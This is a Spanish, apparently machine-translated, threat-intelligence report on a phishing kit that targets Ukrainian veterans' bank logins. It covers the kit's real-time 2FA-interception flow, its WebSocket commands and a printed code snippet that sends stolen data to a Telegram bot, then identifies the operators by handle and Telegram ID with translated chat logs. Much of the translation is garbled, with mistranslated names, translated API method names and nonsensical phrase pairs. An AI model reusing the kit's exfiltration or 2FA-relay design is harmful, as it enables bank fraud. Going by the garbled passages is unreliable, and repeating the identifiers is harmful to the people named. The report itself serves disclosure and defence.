3
Operadores identificados
6
Llamadas a la API para desocultar
2
Proyectos paralelos de phishing
<30
Un análisis completo en cuestión de minutos
Declaración sobre patrocinadores(haz clic para ampliar)
Presentamos al patrocinador oficial de esta investigación
🏆 NICENIC International Group Co., Limited 🏆
El más autoritario tomar nota de eso colabora con Netcraft (engañando a su sistema) · Proveedor oficial de dominios para el Mercado de drogas Kraken · Proveedor de descuentos por volumen · Fiel seguidor de la «El estafador típico» Comunidad de VK, pero aún no ha comprado un curso sobre el anonimato
⭐ 1,8
Trustpilot
Valoración
200 dólares
Precio en .ru
120 rublos reales
0
Denuncias de abuso
ejecutado
- A pesar de afirmar que es «chino» (de Hong Kong), el creador es de Gorlovka, República Popular de Donetsk. El logotipo chino es meramente decorativo, al igual que sus condiciones de uso
- Mantiene Compatibilidad con el idioma ruso a través de VKontakte y Telegram, vende
.ru por 200 dólares, mientras que reg.ru cobra 120 ₽ (aprox. 1,30 $) - Comentarios negativos en Trustpilot que mencionan dominios relacionados con el mercado de las drogas desaparecer misteriosamente. ¿Una coincidencia? Para nada.
- Un suscriptor activo de «El estafador típico» (El típico estafador) Comunidad de VK: cuando tu registrador sigue a grupos de estafadores, ya sabes cuál es su público objetivo
- Colabora con Netcraft lo justo para evitar la exclusión de la lista, al tiempo que se mantiene la infraestructura para dominios relacionados con el phishing, el juego y las drogas
Mientras tanto, en «El estafador típico»:
Una promesa a nuestro patrocinador: Cuando esta publicación de «Типичный Мошенник» se haga realidad —y, por lo que sabemos, es cuestión de cuando, no if — Todo nuestro equipo se registrará en VKontakte y se unirá a la comunidad. Considéralo nuestra ovación. 👏
* Esto es una sátira. NiceNIC no ha patrocinado esta investigación. Sin embargo, la hicieron necesaria al negarse a actuar ante nuestras denuncias de abuso durante más de cinco días. Todo lo expuesto anteriormente se basa en información de dominio público y en nuestra experiencia operativa. Lee nuestro reportaje completo sobre NiceNIC →
Lo que descubrió PhishDestroy
El 20 de marzo de 2026, el proceso automatizado de detección de amenazas de PhishDestroy detectó dopomogvoina[.]sbs — un dominio recién registrado que aloja un sitio web de phishing que se hace pasar por «El escudo del defensor» (Escudo del Defensor), una fundación de ayuda militar ucraniana ficticia. La página web se dirige a veteranos del ejército ucraniano, heridos en combate y familiares de soldados caídos, prometiéndoles ayuda económica del Gobierno mientras sustrae las credenciales bancarias de cinco de los bancos más importantes de Ucrania.
A continuación se ofrece un desglose completo de todo lo que nuestro análisis automatizado ha revelado: la ingeniería social, la infraestructura técnica, el sistema de control de operadores en tiempo real y la identidad de las personas que lo gestionan.
Evaluación de impacto
El sitio web se dirige específicamente a los más vulnerables: veteranos de guerra con trastorno de estrés postraumático, familias de soldados fallecidos en combate que solicitan ayudas del Gobierno y personal militar herido que se enfrenta a complejos trámites burocráticos. Cada dato de acceso robado puede dar lugar a la apropiación total de una cuenta en cuestión de minutos.
Sección 1: El cebo — La falsa Fundación de Ayuda Militar
El dominio dopomogvoina[.]sbs se registró el 20 de marzo de 2026 a través de NICENIC International Group Co., Limited, un registrador con un historial bien documentado de respuestas lentas o inexistentes ante los casos de abuso. El .sbs TLD (Side-By-Side) es un gTLD de bajo coste que se utiliza con frecuencia para crear infraestructuras de phishing desechables.
El sitio web se presenta como un portal de ayuda profesional vinculado al Gobierno. La cabecera está ocupada por una bandera ucraniana, las imágenes militares le dan un aire de autenticidad y el texto está redactado cuidadosamente en ucraniano con un lenguaje burocrático que imita el de los programas gubernamentales oficiales.

Captura de pantalla 5: la página de inicio del sitio de phishing que se hace pasar por «Щит Захисника» (Escudo del Defensor).
Para ganarse la confianza de los usuarios, los operadores crearon un contador de estadísticas que aparecía en un lugar destacado de la página de inicio:
- 2.847 solicitudes — lo que significa que miles de personas ya han recibido ayuda
- Se han repartido 47,2 millones de ₴ — una cifra elevada, pero verosímil, en la UAH
- 19 programas — lo que sugiere una operación integral que abarca varios programas
Estas cifras son totalmente inventadas y están integradas directamente en el código fuente de la página, sin conexión alguna con el servidor. Su único objetivo es servir como prueba social para disipar las dudas de la víctima.
Sección 2: La trampa — 5 bancos, un objetivo
Tras hacer clic en «Подати заявку» (Enviar solicitud), a la víctima se le muestra una pantalla para seleccionar un banco. Aparecen como opciones cinco de los bancos minoristas más importantes de Ucrania, cada uno con su marca y logotipo oficiales. Es aquí donde la ingeniería social pasa de la manipulación emocional al robo técnico.

Captura de pantalla 6 — Pantalla de selección de banco. Cada opción da lugar a una secuencia personalizada de robo de credenciales.
El análisis del paquete de JavaScript del sitio reveló que cada banco tiene un secuencia única de recopilación de credenciales en varios pasos, adaptado al flujo de autenticación real de ese banco:
PrivatBank
Iniciar sesiónContraseñaNúmero de identificación personalSMS
una sola cuenta bancaria
Iniciar sesiónNúmero de identificación personalSMSCorreo electrónico
Oschadbank
Iniciar sesiónVerificarSMS
Ukrsibbank
Iniciar sesiónNúmero de identificación personalSMS
El desarrollo del ataque sigue el mismo patrón en todos los bancos:
Página de ayuda falsa
Selección de bancos
Clon de inicio de sesión
Interceptación de la autenticación de dos factores
Suplantación de identidad

Captura de pantalla 7 — Página de inicio de sesión clonada de PrivatBank.

Captura de pantalla 9 — Página de inicio de sesión de PUMB clonada.

Captura de pantalla 10 — Flujo completo del ataque: desde la página falsa de ayuda militar, pasando por la selección del banco, hasta el robo de credenciales y la apropiación de la cuenta.
La pila tecnológica: Aplicación web de página única (SPA) con React interfaz de usuario proporcionada a través de CDN de Cloudflare, con un Express.js servidor que gestiona la sustracción de credenciales. La arquitectura de React permite crear formularios de varios pasos que se integran a la perfección y que resultan indistinguibles de las interfaces bancarias legítimas.
Sección 3: Control del operador en tiempo real
No se trata de un simple programa de robo de credenciales con una base de datos estática. El kit de phishing incluye un Panel de control WebSocket en tiempo real que permite a un operador humano controlar cada sesión de las víctimas en tiempo real.
El punto final de WebSocket en wss://dopomogvoina[.]sbs/ws admite los siguientes tipos de mensajes:
register — New victim session created
update_user_data — Stolen credentials transmitted to operator
next_step — Operator advances victim to next theft stage
create_application — Victim starts "aid application"
answer_question — Operator sends custom prompt to victim
Este control en tiempo real permite al operador:
- Forzar un estado de espera — mostrar el mensaje «Procesando su solicitud...» mientras acceden a la cuenta bancaria real de la víctima
- Redirigir a un paso concreto — volver a solicitar un código SMS si el primero ha caducado
- Mostrar mensajes de error falsos — «Código no válido, vuelva a introducirlo» para obtener varios tokens de autenticación de dos factores
- Haz preguntas personalizadas — solicitar la fecha de nacimiento, el número de tarjeta o cualquier otro dato durante la sesión
¿Por qué es peligroso?
El control en tiempo real por parte del operador burla las protecciones de la autenticación de dos factores (2FA) basadas en el tiempo. El operador intercepta el código SMS y lo utiliza dentro de su plazo de validez —normalmente entre 30 y 120 segundos—, mientras la víctima se queda mirando una animación falsa de «procesamiento».

Captura de pantalla 8: formulario de introducción del número de teléfono utilizado para iniciar el robo de credenciales.

Captura de pantalla 11 — Panel del bot en tiempo real del operador para controlar las sesiones de las víctimas.
La información completa sustraída en cada sesión: phone, password, PIN, SMS code, card number, date of birth, y email.
Sección 4: Detrás de Cloudflare: dos proyectos, un servidor
El proxy de Cloudflare oculta el servidor de origen, pero el proceso de análisis de la infraestructura de PhishDestroy ha identificado la verdadera dirección IP de origen: 45.131.214[.]148, alojado en RapidSeedbox / LeaseWeb en los Países Bajos.
Un detalle importante: dopomogvoina[.]sbs se transmite a través de Cloudflare, ocultando su dirección IP de origen. Pero nuestro sistema también rastrea hlpforvpeople[.]sbs — un dominio relacionado registrado a través del mismo registrador NICENIC con patrones coincidentes. Ese dominio es NO está detrás de Cloudflare, revelando directamente su dirección IP de origen: 45.131.214[.]148.
Conectarse directamente a esta dirección IP — sin un Host encabezado — reveló algo inesperado: un una página de phishing totalmente diferente. En lugar de la ayuda militar a Ucrania, el servidor virtual predeterminado sirvió «Identificación sanitaria», una operación de phishing relacionada con un seguro médico indonesio. El mismo servidor, víctimas totalmente diferentes, un país totalmente diferente.
El mismo servidor, los mismos operadores, víctimas diferentes
- Proyecto 1: Ayuda militar a Ucrania → robo de credenciales bancarias a veteranos
- Proyecto 2: El seguro médico indonesio → roba los datos de acceso a la asistencia sanitaria de los ciudadanos
- La misma pila de Express.js, el mismo panel de control en tiempo real con WebSocket
- La misma interfaz de gestión del servidor BT-Panel (宝塔)
- Dominio C2 del segundo proyecto:
rezervtemka[.]cc — un panel de phishing conocido identificado en la base de datos de amenazas de PhishDestroy - Comentarios en ruso en el código fuente del proyecto indonesio lo confirman los mismos desarrolladores de CIS

Captura de pantalla 12 — Dos operaciones de phishing paralelas que comparten el mismo servidor de origen: ayuda militar ucraniana (dopomogvoina) y seguro médico indonesio (HealthCare ID).
La plantilla de phishing indonesia es una kit conocido registrado en la base de datos de inteligencia sobre amenazas de PhishDestroy. Hemos observado variantes de esta misma plantilla en todo el sudeste asiático, dirigidas a instituciones financieras de Indonesia, Tailandia y Vietnam. Los operadores se limitan a cambiar las plantillas específicas de cada país, al tiempo que reutilizan la misma infraestructura de fondo.
Delincuentes sin escrúpulos
Esta es la realidad de las operaciones modernas de phishing:
a los operadores no les importa a quién le roban. Veteranos ucranianos que buscan ayuda militar, trabajadores indonesios que contratan seguros médicos... El objetivo cambia según la plantilla que genere más ingresos. Los mismos operadores de habla rusa dirigen ambas campañas simultáneamente desde el mismo servidor, pasando de víctimas en distintos países como si cambiaran de canal de televisión. Hoy son los bancos ucranianos. Mañana podrían ser los bancos israelíes, tal y como ya preguntó Bonya en marzo de 2026.
Sección 5: El archivo config.json que lo reveló todo
Así es como un solo archivo mal configurado echó por tierra toda la operación, paso a paso.
Tras identificar el segundo proyecto del servidor de origen, el de PhishDestroy JS Analyzer —nuestra herramienta automatizada de análisis de JavaScript— se dirigió al paquete del sitio web de phishing indonesio en https://45.131.214[.]148/assets/index-ZMQxHb_h.js. El analizador extrajo todos los puntos de conexión de la API, las URL externas y las rutas de configuración del archivo JavaScript de 335 KB. Entre los hallazgos:
- Cinco puntos de conexión de la API en
rezervtemka[.]cc — el panel C2 para la verificación de credenciales - Una conexión WebSocket a
wss://rezervtemka[.]cc - Integración de Facebook Pixel para el seguimiento de víctimas
- Una referencia a
/config.json — se carga en tiempo de ejecución para la configuración del bot de Telegram
Siguiendo esta pista, fuimos a buscar /config.json desde la IP de origen. Se podía acceder al archivo sin necesidad de autenticación: estaba en el directorio raíz del servidor web y cualquiera podía leerlo:
async function loadConfig() {
const response = await fetch('/config.json');
// ...
}
async function sendNotification() {
const cfg = await loadConfig();
await fetch(`https://api.telegram.org/bot${cfg.bot_token}/sendMessage`, {
method: 'POST',
body: JSON.stringify({ chat_id: cfg.chat_id, text: message })
});
}
El /config.json se podía acceder al archivo directamente desde la IP de origen — Sin autenticación, sin control de acceso, solo un simple archivo JSON ubicado en el directorio raíz del sitio web:
{
"bot_token": "8724623843:AAFXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
"chat_id": "-100XXXXXXXXXX"
}
El token de un bot de Telegram sirve tanto de nombre de usuario como de contraseña. Quien tenga el token puede realizar llamadas a la API en nombre de ese bot. Los administradores dejaron el suyo en un archivo de acceso público. Seis llamadas a la API más tarde, ya lo teníamos todo:
getMe — Identidad del bot: «MonettiCRM» (@MonettiCRM_bot)
Obtén el chat correspondiente al ID de chat. — Nombre del grupo: «Tarjeta Idr» con un enlace de invitación activo
getChatAdministradores — 3 administradores, incluido el creador del grupo
getChat(creator_id) — Creador: @monettiescobar, Telegram Premium, perfil empresarial, zona horaria UTC+3
getChat(admin2_id) — Segundo administrador: perfil vacío, se sospecha que es una cuenta alternativa
obtenerNúmeroDeMiembrosDelChat — 5 miembros en total en el grupo de operadores

Captura de pantalla 13 — La cadena completa de OSINT: desde el archivo config.json expuesto hasta la identificación completa del operador en 6 llamadas a la API.
Desde un simple archivo mal configurado hasta la identificación completa de los operadores en seis solicitudes HTTP. Sin vulnerabilidades, sin acceso no autorizado: solo llamadas estándar a la API de Telegram Bot utilizando un token que los propios operadores dejaron expuesto.
Sección 6: Los operadores
Una reflexión sobre la creatividad delictiva
Lo que viene a continuación es un ejemplo paradigmático de cómo no se deben elegir los alias. Tenemos MONETTI ESCOBAR — porque nada transmite más «discreción» que ponerse el nombre del narcotraficante más famoso de la historia. Y luego está Tómate las cosas con calma, también conocido como Padre del Derecho (literalmente «Papá-Ladrón-por-ley» —una referencia alusiva a la jerarquía criminal rusa—), Bien, y bubullikk. Y, por último, Devoys, cuyo nombre de usuario @devosus Suena sospechosamente a «dev ops us»: un desarrollador que incluyó su cargo en su nombre de usuario. Se trata de personas que creían que podían burlar los sistemas automatizados de inteligencia sobre amenazas. Spoiler: no pudieron.

Captura de pantalla 14 — El grupo de operadores de Telegram «Idr card», al que se ha tenido acceso gracias a la filtración del token del bot.

Propietario / Creador
MONETTI ESCOBAR
@monettiescobar
ID de Telegram: 8135223234
Telegram Premium, perfil empresarial
Zona horaria: UTC+3 (región de la CEI)
10 mensajes públicos — OPSEC estricta
Chat de TraFFeeQMedusa de Google AdsCanal de deepfakes

Operador / Tráfico
Tómate las cosas con calma
Buenos días
ID de Telegram: 6242202706
También conocido como: PapaZakonVor, Boa, bubullikk
261 mensajes repartidos en 12 grupos
DC2 — Ámsterdam, Países Bajos
CryptoGrabMercado STYXNivel CCEMPIRE CHATSolución Phoenix
Desarrollador / Programador
Devoys
@devosus
ID de Telegram: 8213612730
Desarrollador de kits de phishing — los operadores se refieren a él como «programador»
Se les pidió que «pensaran en la defensa» al descubrirse la filtración
Diseño que minimiza el impacto en el espacio público
Comprar @devosus ≈ «dev ops us» — el puesto de trabajo como nombre de usuario
Desarrollador de kitsInfraestructuraSeguridad
MONETTI ESCOBAR — El jefe
MONETTI mantiene una estricta seguridad operativa — solo 10 mensajes públicos divididos en dos grupos. Pero los grupos lo dicen todo: Chat de TraFFeeQ (arbitraje de tráfico con fines fraudulentos), Medusa de Google Ads (prácticas de «black hat» en Google Ads), y un Canal de deepfakes. En su perfil profesional de Telegram figura «Есть предложение» («Tengo una propuesta») — que anuncian abiertamente sus servicios. La zona horaria UTC+3 (la misma que la de Moscú, Minsk y Kiev) y el horario de atención al público las 24 horas del día, los 7 días de la semana, confirman que se trata de una empresa con sede en la CEI que opera sin descanso.
Bonya — El descuidado
A diferencia de la rigurosa seguridad operativa (OPSEC) de MONETTI, Bonya (antiguo alias: Padre del Derecho —algo así como «PapáLadrónPorLey»— dejó un rastro digital enorme — 261 mensajes repartidos entre 12 grupos clandestinos. Su historial de chat parece un currículum de delincuente:
Palabras de Bonya (traducidas del ruso)
- «Apuestas con cuota inferior a 2,0» → «Solo phishing para [seguridad bancaria] 2.0» — analizar la compatibilidad de los kits de phishing con los sistemas de seguridad bancarios más recientes
- «Es difícil encontrar buenos drops» → «Es difícil encontrar buenos «mules» para el blanqueo de dinero» — buscar cómplices para el blanqueo de dinero
- «Ven a trabajar conmigo al centro cultural» → «Ven a trabajar a mi centro de atención telefónica» — contratación de operadores
- «¿Hay alguien aquí que haya trabajado con bancos israelíes?» → «¿Hay alguien aquí que haya trabajado con bancos israelíes?» — Ampliación a nuevos objetivos (marzo de 2026)
- «La verdad es que no veo muchos logotipos de la Finka». → «No veo muchos registros financieros» — sobre la calidad de las credenciales robadas
- «Si un proxy consume entre 1 y 2 amperios» → «Un único representante para solo uno o dos bancos» — debate sobre la seguridad operativa en materia de fraude bancario
- «El cajero automático se quedó con su tarjeta» → «El cajero automático se quedó con su tarjeta» — Un «mulo» les robó 60 000 ₴, alegando que el cajero automático se había quedado con la tarjeta. Incluso los delincuentes son víctimas de estafas por parte de sus propios cómplices.
Sus afiliaciones a diversos grupos ofrecen una visión completa: CryptoGrab (los que vacían carteras de criptomonedas), Mercado STYX (mercado negro de datos robados), Comprobador de CC de nivel (herramientas de validación de tarjetas de crédito), EMPIRE CHAT y Solución Phoenix (coordinación de fraudes). No se trata de un delincuente ocasional, sino de alguien integrado en el ecosistema de la ciberdelincuencia.
Devoys — El desarrollador
La columna vertebral técnica de la operación. Diseñada para tener una presencia pública mínima; cuando el grupo fue vulnerado, Bonya lo llamó expresamente: «@devosus, piensa en la defensa antes de que nos den una paliza». — «@devosus, pensemos en la defensa antes de que nos den una paliza». Su respuesta sarcástica ante la filtración — «¿Cuándo a la Interpol?» («cuándo interpolar») — lo que sugiere que no es la primera vez que se han salvado por los pelos.
Análisis del comportamiento: 261 mensajes descifrados
El canal de OSINT de PhishDestroy recopiló y tradujo los 261 mensajes públicos procedentes de Bonya a través de 12 grupos clandestinos de Telegram (junio de 2024 — marzo de 2026). Traducción automática mediante la API de DeepL con corrección manual del contexto. Los mensajes revelan un perfil operativo completo, clasificado a continuación por tipo de actividad delictiva.
Distribución de mensajes: 261 mensajes repartidos en 12 grupos
- 💬ONE|Chat — 91 mensajes (coordinación contra el fraude)
- Actualidad/Verificaciones — 37 mensajes (estafas de verificación)
- Rolex | chat general — 28 mensajes (carding)
- EMPIRE CHAT — 24 mensajes (mercado negro)
- Fbstore — 23 mensajes (arbitraje de tráfico)
- Documento de Facebook — 22 mensajes (fraude publicitario)
- Solución Phoenix — 17 mensajes (fraude bancario)
- CryptoGrab — 11 mensajes (consumo de criptomonedas)
- Mercado STYX — 2 mensajes (mercado clandestino)
- Comprobador de CC de nivel — 2 mensajes (verificación de tarjetas)
Fraude bancario y phishing
💬ONE|ChatMarzo de 2025
«Aquí solo hay 2,0 phish»
Y aquí las fichas con una corriente de 2,0 A
Análisis de la compatibilidad de los kits de phishing con los nuevos protocolos de seguridad bancaria
💬ONE|ChatMarzo de 2025
«Tío, aquí no venden nada a través de phishing, es phishing para sacar dinero».
Tío, aquí no venden nada con fichas; aquí las fichas son para pagar.
Distinción entre el phishing con fines de venta y el phishing con fines de robo directo
Solución PhoenixA partir de 2026
«¿Hay alguien aquí que haya trabajado con bancos en Israel?»
¿Hay alguien aquí que haya trabajado con bancos israelíes?
Ampliación de las operaciones al sector bancario israelí — 5 días antes de nuestra investigación
Rolex | chat generalSeptiembre de 2024
«Si hay un solo representante, solo uno o dos bancos»
Si hay 1 proxy, 1-2 bancos de corriente
Seguridad operativa frente al fraude multibancario: un proxy por cada 1-2 bancos para evitar ser detectados
Rolex | chat generalSeptiembre de 2024
«No veo muchos registros financieros»
La verdad es que no veo muchos logotipos de la Finka
Quejas sobre la calidad de las credenciales bancarias robadas en los mercados negros
«Mulas de dinero» y «retirada de efectivo»
💬ONE|ChatMarzo de 2025
«Es difícil encontrar buenas ofertas»
Es difícil encontrar buenos drops
«Drops» = personas que se encargan de retirar fondos robados. Se quejan de la dificultad para reclutar gente.
💬ONE|ChatMarzo de 2025
«Ven a trabajar a mi centro de atención telefónica»
Ven a trabajar a mi centro cultural
Reclutamiento activo de personal para un centro de llamadas dedicado al fraude
ActualidadJunio de 2024
«Nos han robado 60 000 dólares»
Nos han robado 60 000
Un «mulo» les robó 60 000 ₴ a los propios estafadores. Una justicia irónica.
ActualidadJunio de 2024
«¿Cómo coño se le ha podido tragar la tarjeta al cajero automático?»
¿Cómo coño se le ha podido tragar la tarjeta al cajero?
El intermediario afirmó que el cajero automático «se había quedado» con la tarjeta para quedarse con el dinero robado. Estafadores estafando a estafadores.
ActualidadJunio de 2024
«Nos lo transfirió, pero luego no teníamos la cuenta principal para mover el dinero».
Ella nos pasó el problema a nosotros, pero nosotros no teníamos la cuenta principal para transferir el dinero
Descripción de la cadena de retirada de efectivo: víctima → cuenta intermediaria → «mula» principal
Fraude de tráfico y uso indebido de la publicidad
EMPIRE CHATA partir de 2026
«No uso Google, solo Facebook»
Bueno, yo no uso Google, solo Facebook
Se especializa en el fraude publicitario en Facebook: redirige el tráfico hacia páginas de phishing
Documento de FacebookFebrero de 2026
«Yo tampoco destinaría un porcentaje del presupuesto publicitario sin un avalista».
Yo tampoco invertiría un porcentaje del gasto sin una garantía
Negociación de las condiciones de pago para la realización de campañas publicitarias fraudulentas en Facebook
CryptoGrabEnero de 2025
«Probé el AML en Facebook para dirigirme al mercado estadounidense, pero no encontré ninguna configuración adecuada en Internet».
He intentado buscar «aml» en Facebook, pero tampoco he encontrado nada interesante, ni siquiera enlaces antiguos, en Internet.
Intento de utilizar anuncios de Facebook para llevar a cabo estafas relacionadas con la lucha contra el blanqueo de capitales dirigidas a víctimas estadounidenses
Perfil psicológico: Bonya
El corpus de 261 mensajes revela un ciberdelincuente de nivel medio con actividades diversificadas: phishing bancario, redes de «mulas» de dinero, fraude en anuncios de Facebook, robo de criptomonedas y suplantación de identidad con tarjetas de crédito. Características principales:
- Descuido operativo — 261 mensajes en grupos públicos desde una sola cuenta. El uso de varios alias (PapaZakonVor → Boa → Bonya) sugiere que se conoce la importancia de la seguridad operativa (OPSEC), pero que no se aplica en la práctica.
- Mentalidad de contratación — invita activamente a la gente a «trabajar en mi centro de atención telefónica» y vende conocimientos operativos a cambio de dinero
- Indiferencia hacia las víctimas — analiza los objetivos ucranianos, europeos, israelíes y estadounidenses con el mismo distanciamiento. La geografía no es más que una variable en la ecuación del fraude
- Problemas de confianza — fue traicionado por su propio «mulo» por 60 000 ₴. Irónicamente, esto refleja la desconfianza que él mismo genera en sus víctimas
- Impulsado por la expansión — tan recientemente como en marzo de 2026, buscando activamente nuevos mercados bancarios (Israel), lo que sugiere que el phishing ucraniano es solo una de las muchas operaciones que se están llevando a cabo simultáneamente
Bonya: Registro completo de mensajes (253 mensajes repartidos en 12 grupos)
-- Phoenix Solution (16 mensajes) --
B
Tómate las cosas con calma2026-03-17 14:22
¿Hay alguien aquí que haya trabajado con bancos en Israel?¿Hay alguien aquí que haya trabajado con bancos israelíes?
B
Tómate las cosas con calma2026-03-17 14:22
trabajando en silencio, también.Nosotros también trabajamos en silencio
B
Tómate las cosas con calma2026-03-17 14:17
¿Qué tal?¿Qué tal?
B
Tómate las cosas con calma2026-03-17 14:17
Hola a todosHola a todos
B
Tómate las cosas con calma2026-03-15 19:02
Bueno, ya está prácticamente todo arreglado.Bueno, en general ya lo tienen todo solucionado
B
Tómate las cosas con calma2026-03-15 19:02
Bueno, es un poco complicadoBueno, pues hemos montado un pequeño lío
B
Tómate las cosas con calma2026-03-15 19:01
Sí, yo también he estado trabajando mucho en silencio, qué lío.Sí, yo también estoy harto de tanto trabajar en silencio
B
Tómate las cosas con calma2026-03-15 19:00
¿Qué tal te ha ido el día libre?¿Cómo fue el fin de semana?
B
Tómate las cosas con calma2026-03-15 19:00
Todos vosotros.Para todos
B
Tómate las cosas con calma2026-03-14 14:29
Ya no es tan anónimo, ahora que todo el mundo sabe que es Marik.Ya no es tan anónimo, ya que todo el mundo sabe quién es Marik
B
Tómate las cosas con calma2026-03-14 14:24
RenacidoRenacido
B
Tómate las cosas con calma2026-03-14 14:24
JajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajJajajajajajajajaja
B
Tómate las cosas con calma2026-03-14 14:23
Me entristeció ver que la sala de chat ya no estaba.Me quedé muy triste cuando vi que el chat había desaparecido
B
Tómate las cosas con calma2026-03-14 14:22
Pensaba que nunca te encontraría.Ya pensaba que no iba a encontraros
B
Tómate las cosas con calma2026-03-14 14:22
MiКу
B
Tómate las cosas con calma2026-03-14 14:22
JoderJoder
-- 👨⚕️ FB-DOC — Chat sobre arbitraje de tráfico (21 mensajes) --
B
Tómate las cosas con calma2026-03-15 07:23
@fbdoc21@fbdoc21
B
Tómate las cosas con calma2026-03-15 07:20
Date un golpe en la frente con la polla.Dámete un golpe en la frente con el pene
B
Tómate las cosas con calma2026-03-06 15:18
Como cinco en una pantalla de 2,5 pulgadas 😂.Como se ve en la captura de pantalla: 2,5😂
B
Tómate las cosas con calma2026-02-19 17:05
a todos vosotros.A todos ustedes
B
Tómate las cosas con calma2026-02-19 17:04
Si cierras un trato, me voy a reír.Si abres una operación, me voy a cagar de miedo
B
Tómate las cosas con calma2026-02-19 17:04
continental?¿Continental?
B
Tómate las cosas con calma2026-02-19 17:04
Ahí la tienes.pues ahí está, está de acuerdo
B
Tómate las cosas con calma2026-02-19 17:01
Así que comprueba siempre los antecedentes cuando pidas un avalista.Así que compruébalo siempre que preguntes por la garantía
B
Tómate las cosas con calma2026-02-19 17:00
Preguntó por un avalista y se largó enseguida.Le pregunté por el garante y desapareció enseguida
B
Tómate las cosas con calma2026-02-19 17:00
Soy Carina.Ay, Karina
B
Tómate las cosas con calma2026-02-19 16:59
¿Así que vas a buscar un avalista?¿Te vas a «Garant»?
B
Tómate las cosas con calma2026-02-19 16:57
Yo tampoco aceptaría un porcentaje de los ingresos sin un avalista.Yo tampoco invertiría un porcentaje del gasto sin una garantía
B
Tómate las cosas con calma2026-02-19 16:57
я?я?
B
Tómate las cosas con calma2026-02-19 16:57
Bueno, ella me mandó capturas de pantalla y tú no me has dado nada.Bueno, ella ha subido unas capturas de pantalla y tú no has aportado nada
B
Tómate las cosas con calma2026-02-19 16:56
mira las capturas de pantalla que ha publicadoEcha un vistazo a las capturas de pantalla que ha enviado
B
Tómate las cosas con calma2026-02-19 16:55
¿No mencionó nada sobre un avalista?¿No ha escrito nada sobre el garante?
B
Tómate las cosas con calma2026-02-19 16:54
Eres un bicho raro😂¿Qué friki eres?😂
B
Tómate las cosas con calma2026-02-19 16:53
Me has pedido un avalista.¿Le has pedido a Garanta?
B
Tómate las cosas con calma2026-02-19 16:52
donde¿En qué lugar?
B
Tómate las cosas con calma2026-02-17 14:37
¿Quién va a conseguirle a una tienda unos buenos coches?¿Quién me recomienda una tienda con buenos coches?
B
Tómate las cosas con calma2026-02-17 12:10
Te lo hacen donde tú quieras😂En cualquier sitio, si les apetece, te lo harán😂
-- EMPIRE CHAT (24 mensajes) --
B
Tómate las cosas con calma2026-03-14 13:17
Ya he descubierto cómo se hace, pero me da pereza explicarlo.Ya lo he entendido, pero me da pereza explicarlo
B
Tómate las cosas con calma2026-03-14 13:17
Te va a dar una paliza, pase lo que pase.Te va a timar, pase lo que pase
B
Tómate las cosas con calma2026-03-12 17:16
De diferentes maneras.De diversas maneras
B
Tómate las cosas con calma2026-03-12 17:08
+ Además, ahora mismo hay muchas tormentas.+ Ahora mismo hay fuertes tormentas
B
Tómate las cosas con calma2026-03-12 17:07
Si es negro, te lo apuestoSi fuera negro, habría apostado
B
Tómate las cosas con calma2026-03-12 17:07
Depende del tipo de oferta; si es blanca, sí.Depende de la oferta; si es la blanca, sí.
B
Tómate las cosas con calma2026-03-12 17:06
Son dos mundos diferentesSon dos mundos diferentes
B
Tómate las cosas con calma2026-03-12 17:06
No hay ningún otroNo hay ninguna otra
B
Tómate las cosas con calma2026-03-12 17:06
Puedes configurarlo para que solo los ordenadoresAllí se puede configurar para que solo aparezcan los ordenadores
B
Tómate las cosas con calma2026-03-12 17:05
Google no es tan eficaz como yo creo.En mi opinión, Google no es tan eficaz
B
Tómate las cosas con calma2026-03-12 17:05
Bueno, yo no uso Google, solo Facebook.Bueno, yo no uso Google, solo Facebook
B
Tómate las cosas con calma2026-03-12 17:05
Siempre y cuando haya que encontrar una ligadura en algún momento.Siempre y cuando aún haya que reunir a todos estos inútiles y formar un grupo
B
Tómate las cosas con calma2026-03-12 17:04
Rechazos y ackeys que salen disparados como tormentas. Etcétera.Los rechazos, las cuentas se van al traste sin más, como si nada. Etcétera.
B
Tómate las cosas con calma2026-03-12 17:04
No todo es de color de rosa, tío.No, eso no es todo, tío, son solo florecitas
B
Tómate las cosas con calma2026-03-12 17:03
Todas las adquisiciones regulares de Air con mayor confianzaTodas las baterías de aire normales con la mejor confianza
B
Tómate las cosas con calma2026-03-12 17:03
En este momento no hay ninguna agencia que valga la pena en el mercado.Ahora mismo no hay buenas agencias en el mercado
B
Tómate las cosas con calma2026-03-12 17:02
Más angustiante que aterradorMás bien me pone de los nervios que me da miedo
B
Tómate las cosas con calma2026-03-12 17:02
Las criptomonedas, la pasión por el juego y la negritud se desbordanCriptomonedas, juegos de azar y cosas oscuras, todo me encanta
B
Tómate las cosas con calma2026-03-12 17:01
Lo último que hizo la ciudad fue pasar a 2D.Lo último que se veía en 2D era genial
B
Tómate las cosas con calma2026-03-12 17:01
Si me buscas por mi cuenta o por el presupuesto, verás que las escaladas en 2D requieren entre 1000 y 2000 zeles para pruebas, y eso no durará mucho.Si lo busco, ya sea con mis propios fondos o con el presupuesto, para encontrar algo que funcione en 2D hay que gastarse entre 1000 y 2000 en pruebas, y aun así no durará mucho.
B
Tómate las cosas con calma2026-03-12 17:00
Estoy sirviendoEstoy echando
B
Tómate las cosas con calma2026-03-12 16:59
(ya que no existen tales requisitos para las ofertas de personas blancas)Porque no hay requisitos de ese tipo para las ofertas blancas)
B
Tómate las cosas con calma2026-02-14 14:33
¿Quién tiene un «dreiner» en la prueba AML? Solo con DEP o «ready» en el avalista¿Alguien tiene un drenador para la prueba AML? ¿Solo con depósito o ya montados en el garantista?
B
Tómate las cosas con calma2026-01-11 03:14
Hay alguien en el grupo de Facebook y hay un compañero. Necesito que Facebook me reponga el saldo; el precio es negociable.Hay quien ha dado «Me gusta» en Facebook, y hay comentarios. Hay que recargar el saldo de Facebook; el precio lo acordamos.
-- SТYХ СНAT [ STYXMARKET.ST ] (2 mensajes) --
B
Tómate las cosas con calma2025-12-05 12:04
Necesito facturas, Payzaty, Cashfree, Eportal 3DSNecesito facturas, Payzaty, Cashfree, Eportal 3DS
B
Tómate las cosas con calma2025-11-22 11:14
¿Hay un moderador en el chat?¿Hay alguien que se encargue del chat?
-- Chat de arbitraje de tráfico (2 mensajes) --
B
Tómate las cosas con calma2025-11-24 14:50
100 %100 %
B
Tómate las cosas con calma2025-11-24 14:49
El canal Tg será secuestrado¿Me van a robar el canal de Telegram?
-- Comprobador de CC de Raven (2 mensajes) --
B
Tómate las cosas con calma2025-11-21 21:19
